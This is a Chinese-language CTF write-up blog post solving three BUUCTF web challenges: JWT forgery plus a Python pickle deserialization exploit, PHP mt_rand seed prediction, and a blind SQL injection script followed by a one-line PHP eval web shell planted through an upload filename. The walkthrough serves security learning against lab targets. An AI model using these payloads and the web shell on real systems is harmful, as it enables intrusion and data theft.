

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Yu ting">
  <meta name="keywords" content="">
  <title>buu - liquor&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"liquor-boop.github.io","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="buu">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-07-24 20:19" pubdate>
        July 24, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      18
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">buu</h1>
            
            <div class="markdown-body">
              <h2 id="CISCN2019-华北赛区-Day1-Web2-ikun"><a class="header-anchor" href="#CISCN2019-华北赛区-Day1-Web2-ikun">🍭</a>[CISCN2019 华北赛区 Day1 Web2]ikun</h2>
<p>题目提示要lv6，翻了几页找不到，用脚本跑</p>
<p><img src="/2021/07/24/ikun/1.png" srcset="/img/loading.gif" alt="1"></p>
<p>余额不够，抓包改一下折扣，成功购买，需要admin权限，可利用JWT伪造admin身份，JWT解码</p>
<p><img src="/2021/07/24/ikun/2.png" srcset="/img/loading.gif" alt="2"></p>
<p>需要先爆破密钥</p>
<p><img src="/2021/07/24/ikun/4.png" srcset="/img/loading.gif" alt="4"></p>
<p>伪造JWT</p>
<p><img src="/2021/07/24/ikun/5.png" srcset="/img/loading.gif" alt="5"></p>
<p>抓包修改</p>
<p><img src="/2021/07/24/ikun/3.png" srcset="/img/loading.gif" alt="3"></p>
<p>得到源码,在admin.py里发现python反序列化</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> tornado.web
<span class="hljs-keyword">from</span> sshop.base <span class="hljs-keyword">import</span> BaseHandler
<span class="hljs-keyword">import</span> pickle
<span class="hljs-keyword">import</span> urllib


<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">AdminHandler</span>(<span class="hljs-params">BaseHandler</span>):</span>
<span class="hljs-meta">    @tornado.web.authenticated</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get</span>(<span class="hljs-params">self, *args, **kwargs</span>):</span>
        <span class="hljs-keyword">if</span> self.current_user == <span class="hljs-string">&quot;admin&quot;</span>:
            <span class="hljs-keyword">return</span> self.render(<span class="hljs-string">&#x27;form.html&#x27;</span>, res=<span class="hljs-string">&#x27;This is Black Technology!&#x27;</span>, member=<span class="hljs-number">0</span>)
        <span class="hljs-keyword">else</span>:
            <span class="hljs-keyword">return</span> self.render(<span class="hljs-string">&#x27;no_ass.html&#x27;</span>)

<span class="hljs-meta">    @tornado.web.authenticated</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">post</span>(<span class="hljs-params">self, *args, **kwargs</span>):</span>
        <span class="hljs-keyword">try</span>:
            become = self.get_argument(<span class="hljs-string">&#x27;become&#x27;</span>)
            p = pickle.loads(urllib.unquote(become))
            <span class="hljs-keyword">return</span> self.render(<span class="hljs-string">&#x27;form.html&#x27;</span>, res=p, member=<span class="hljs-number">1</span>)
        <span class="hljs-keyword">except</span>:
            <span class="hljs-keyword">return</span> self.render(<span class="hljs-string">&#x27;form.html&#x27;</span>, res=<span class="hljs-string">&#x27;This is Black Technology!&#x27;</span>, member=<span class="hljs-number">0</span>)</code></pre>
<p>当<code>__reduce__</code>被定义之后，该对象被Pickle时就会被调用我们这里的eval用于重建对象的时候调用，即告诉python如何pickle他们供eval使用的即打开的文件flag.txt.<br>
EXP：</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> pickle
<span class="hljs-keyword">import</span> urllib

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">payload</span>(<span class="hljs-params">object</span>):</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__reduce__</span>(<span class="hljs-params">self</span>):</span>
       <span class="hljs-keyword">return</span> (eval, (<span class="hljs-string">&quot;open(&#x27;/flag.txt&#x27;,&#x27;r&#x27;).read()&quot;</span>,))

a = pickle.dumps(payload())
a = urllib.quote(a)
<span class="hljs-keyword">print</span> a</code></pre>
<p><img src="/2021/07/24/ikun/7.png" srcset="/img/loading.gif" alt="7"></p>
<p>抓包传值</p>
<p><img src="/2021/07/24/ikun/6.png" srcset="/img/loading.gif" alt="6"></p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/wangtanzhi/p/12178311.html">https://www.cnblogs.com/wangtanzhi/p/12178311.html</a></p>
<h2 id="GWCTF-2019-枯燥的抽奖"><a class="header-anchor" href="#GWCTF-2019-枯燥的抽奖">🍭</a>[GWCTF 2019]枯燥的抽奖</h2>
<h4 id="php种子伪随机数"><a class="header-anchor" href="#php种子伪随机数">🍭</a>php种子伪随机数</h4>
<p><code>mt_scrand(seed)</code>函数通过分发seed种子，靠mt_rand()生成随机数。</p>
<img src="/2021/07/24/ikun/11.png" srcset="/img/loading.gif" alt="11" style="zoom:50%;">
<p>但存在两次随机数一样的，这就是伪随机数的漏洞，存在可预测性。</p>
<h4 id="解题"><a class="header-anchor" href="#解题">🍭</a>解题</h4>
<p>查看源码，提示有check.php</p>
<pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span>
<span class="hljs-comment">#这不是抽奖程序的源代码！不许看！</span>
header(<span class="hljs-string">&quot;Content-Type: text/html;charset=utf-8&quot;</span>);
session_start();
<span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>($_SESSION[<span class="hljs-string">&#x27;seed&#x27;</span>]))&#123;
$_SESSION[<span class="hljs-string">&#x27;seed&#x27;</span>]=rand(<span class="hljs-number">0</span>,<span class="hljs-number">999999999</span>);   <span class="hljs-comment">//随机数设置session</span>
&#125;

mt_srand($_SESSION[<span class="hljs-string">&#x27;seed&#x27;</span>]);
$str_long1 = <span class="hljs-string">&quot;abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ&quot;</span>;
$str=<span class="hljs-string">&#x27;&#x27;</span>;
$len1=<span class="hljs-number">20</span>;
<span class="hljs-keyword">for</span> ( $i = <span class="hljs-number">0</span>; $i &lt; $len1; $i++ )&#123;
    $str.=substr($str_long1, mt_rand(<span class="hljs-number">0</span>, strlen($str_long1) - <span class="hljs-number">1</span>), <span class="hljs-number">1</span>);       
&#125;
$str_show = substr($str, <span class="hljs-number">0</span>, <span class="hljs-number">10</span>);
<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;p id=&#x27;p1&#x27;&gt;&quot;</span>.$str_show.<span class="hljs-string">&quot;&lt;/p&gt;&quot;</span>;


<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">&#x27;num&#x27;</span>]))&#123;
    <span class="hljs-keyword">if</span>($_POST[<span class="hljs-string">&#x27;num&#x27;</span>]===$str)&#123;x
        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;p id=flag&gt;抽奖，就是那么枯燥且无味，给你flag&#123;xxxxxxxxx&#125;&lt;/p&gt;&quot;</span>;
    &#125;
    <span class="hljs-keyword">else</span>&#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;p id=flag&gt;没抽中哦，再试试吧&lt;/p&gt;&quot;</span>;
    &#125;
&#125;
show_source(<span class="hljs-string">&quot;check.php&quot;</span>);</code></pre>
<p>给了随机数列，我们需要找到种子;先用脚本将伪随机数转换成php_mt_seed可以识别的数据</p>
<pre><code class="hljs vim">str1=<span class="hljs-string">&#x27;abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ&#x27;</span>
str2=<span class="hljs-string">&#x27;Ntkilw3DeO&#x27;</span>
str3 = str1[::-<span class="hljs-number">1</span>]
length = <span class="hljs-built_in">len</span>(str2)
<span class="hljs-keyword">res</span>=<span class="hljs-string">&#x27;&#x27;</span>
<span class="hljs-keyword">for</span> i in <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(str2)):
    <span class="hljs-keyword">for</span> <span class="hljs-keyword">j</span> in <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(str1)):
        <span class="hljs-keyword">if</span> str2[i] == str1[<span class="hljs-keyword">j</span>]:
            <span class="hljs-keyword">res</span>+=str(<span class="hljs-keyword">j</span>)+<span class="hljs-string">&#x27; &#x27;</span>+str(<span class="hljs-keyword">j</span>)+<span class="hljs-string">&#x27; &#x27;</span>+<span class="hljs-string">&#x27;0&#x27;</span>+<span class="hljs-string">&#x27; &#x27;</span>+str(<span class="hljs-built_in">len</span>(str1)-<span class="hljs-number">1</span>)+<span class="hljs-string">&#x27; &#x27;</span>
            <span class="hljs-keyword">break</span>
<span class="hljs-keyword">print</span> (<span class="hljs-keyword">res</span>)</code></pre>
<p><img src="/2021/07/24/ikun/8.png" srcset="/img/loading.gif" alt="8"></p>
<p>爆破伪随机数和php版本</p>
<p><img src="/2021/07/24/ikun/9.png" srcset="/img/loading.gif" alt="9"></p>
<p>send值为810236868，用部分源码生成完整字符串：</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
mt_srand(<span class="hljs-number">810236868</span>);

$str_long1 = <span class="hljs-string">&quot;abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ&quot;</span>;
$str=<span class="hljs-string">&#x27;&#x27;</span>;
$len1=<span class="hljs-number">20</span>;
<span class="hljs-keyword">for</span> ( $i = <span class="hljs-number">0</span>; $i &lt; $len1; $i++ )&#123;
    $str.=substr($str_long1, mt_rand(<span class="hljs-number">0</span>, strlen($str_long1) - <span class="hljs-number">1</span>), <span class="hljs-number">1</span>);       
&#125;
<span class="hljs-keyword">echo</span> $str;

<span class="hljs-meta">?&gt;</span></code></pre>
<p>提交字符</p>
<p><img src="/2021/07/24/ikun/10.png" srcset="/img/loading.gif" alt="10"></p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43801002/article/details/107760064">https://blog.csdn.net/qq_43801002/article/details/107760064</a></p>
<h2 id="CISCN2019-总决赛-Day2-Web1-Easyweb"><a class="header-anchor" href="#CISCN2019-总决赛-Day2-Web1-Easyweb">🍭</a>[CISCN2019 总决赛 Day2 Web1]Easyweb</h2>
<ul>
<li>备份文件泄露</li>
<li>SQL注入</li>
<li>php短标签</li>
</ul>
<p>通过robots.txt发现存在.bak备份文件，尝试后获取到image.php.bak文件，代码：</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-keyword">include</span> <span class="hljs-string">&quot;config.php&quot;</span>;

$id=<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">&quot;id&quot;</span>])?$_GET[<span class="hljs-string">&quot;id&quot;</span>]:<span class="hljs-string">&quot;1&quot;</span>;
$path=<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">&quot;path&quot;</span>])?$_GET[<span class="hljs-string">&quot;path&quot;</span>]:<span class="hljs-string">&quot;&quot;</span>;

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(<span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;\\0&quot;</span>,<span class="hljs-string">&quot;%00&quot;</span>,<span class="hljs-string">&quot;\\&#x27;&quot;</span>,<span class="hljs-string">&quot;&#x27;&quot;</span>),<span class="hljs-string">&quot;&quot;</span>,$id);
$path=str_replace(<span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;\\0&quot;</span>,<span class="hljs-string">&quot;%00&quot;</span>,<span class="hljs-string">&quot;\\&#x27;&quot;</span>,<span class="hljs-string">&quot;&#x27;&quot;</span>),<span class="hljs-string">&quot;&quot;</span>,$path);

$result=mysqli_query($con,<span class="hljs-string">&quot;select * from images where id=&#x27;<span class="hljs-subst">&#123;$id&#125;</span>&#x27; or path=&#x27;<span class="hljs-subst">&#123;$path&#125;</span>&#x27;&quot;</span>);
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path=<span class="hljs-string">&quot;./&quot;</span> . $row[<span class="hljs-string">&quot;path&quot;</span>];
header(<span class="hljs-string">&quot;Content-Type: image/jpeg&quot;</span>);
readfile($path);</code></pre>
<p>对单引号进行过滤，无法闭合单引号，可以用<code>\0</code>来转义掉它的单引号。输入<code>\0</code>，经过“addslashes”函数会先变成<code>\\0</code>,然后经过“str_replace”函数，会变成<code>\</code>,这样，就把id后面的单引号给转义了。</p>
<pre><code class="hljs livecodeserver">import  requests

url = <span class="hljs-string">&quot;http://52890d33-fd0d-4e31-9f0b-46921a22705b.node4.buuoj.cn/image.php?id=\\0&amp;path=&quot;</span>
payload = <span class="hljs-string">&quot;or id=if(ascii(substr((select username from users),&#123;0&#125;,1))&gt;&#123;1&#125;,1,0)%23&quot;</span>
<span class="hljs-built_in">result</span> = <span class="hljs-string">&quot;&quot;</span>
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">1</span>,<span class="hljs-number">100</span>):
    l = <span class="hljs-number">1</span>
    r = <span class="hljs-number">130</span>
    <span class="hljs-keyword">mid</span> = (l + r)&gt;&gt;<span class="hljs-number">1</span>
    <span class="hljs-keyword">while</span>(l&lt;r):
        payloads = payload.<span class="hljs-built_in">format</span>(i,<span class="hljs-keyword">mid</span>)
        print(url+payloads)
        html = requests.<span class="hljs-built_in">get</span>(url+payloads)
        <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;JFIF&quot;</span> <span class="hljs-keyword">in</span> html.<span class="hljs-keyword">text</span>:
            l = <span class="hljs-keyword">mid</span> +<span class="hljs-number">1</span>
        <span class="hljs-keyword">else</span>:
            r = <span class="hljs-keyword">mid</span>
        <span class="hljs-keyword">mid</span> = (l + r)&gt;&gt;<span class="hljs-number">1</span>
    <span class="hljs-built_in">result</span>+=chr(<span class="hljs-keyword">mid</span>)
    print(<span class="hljs-built_in">result</span>)</code></pre>
<p>脚本注出账号和密码</p>
<p><img src="/2021/07/24/ikun/13.png" srcset="/img/loading.gif" alt="13"></p>
<p>登录后是文件上传，随便传一张图片发现会将文件名和用户名写入日志文件。但是这里日志文件为php格式，考虑写入shell。由于用户名只能为admin无法利用，考虑文件名注入。文件名进行了php过滤，可以使用短标签绕过：</p>
<pre><code class="hljs php-template"><span class="xml">filename=&quot;</span><span class="php"><span class="hljs-meta">&lt;?=</span>@<span class="hljs-keyword">eval</span>($_POST[<span class="hljs-string">&#x27;a&#x27;</span>]);<span class="hljs-meta">?&gt;</span></span><span class="xml">&quot;</span></code></pre>
<p><img src="/2021/07/24/ikun/12.png" srcset="/img/loading.gif" alt="12"></p>
<p>蚁剑连接</p>
<p><img src="/2021/07/24/ikun/14.png" srcset="/img/loading.gif" alt="14"></p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/wangtanzhi/p/12253918.html">https://www.cnblogs.com/wangtanzhi/p/12253918.html</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">python反序列化</a>
                    
                      <a class="hover-with-bg" href="/categories/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/php%E4%BC%AA%E9%9A%8F%E6%9C%BA%E6%95%B0%E6%BC%8F%E6%B4%9E/">php伪随机数漏洞</a>
                    
                      <a class="hover-with-bg" href="/categories/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/php%E4%BC%AA%E9%9A%8F%E6%9C%BA%E6%95%B0%E6%BC%8F%E6%B4%9E/%E5%88%B7%E9%A2%98/">刷题</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/python/">python</a>
                    
                      <a class="hover-with-bg" href="/tags/php/">php</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/07/26/shell-1/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">无字母数字shell</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/07/23/pickle/">
                        <span class="hidden-mobile">Python Pickle反序列化漏洞</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
